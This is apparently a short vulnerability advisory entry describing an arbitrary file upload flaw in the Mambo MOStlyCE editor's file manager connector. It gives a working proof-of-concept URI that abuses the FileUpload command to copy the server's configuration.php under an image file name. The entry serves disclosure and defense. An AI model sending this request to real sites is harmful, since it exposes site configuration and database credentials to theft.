• info
• discussion
• exploit
• solution
• references

Mambo MOStlyCE Module Image Manager Utility Arbitrary File Upload Vulnerability

Attackers may exploit this issue through a browser.

The following proof-of-concept URI is available:

http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=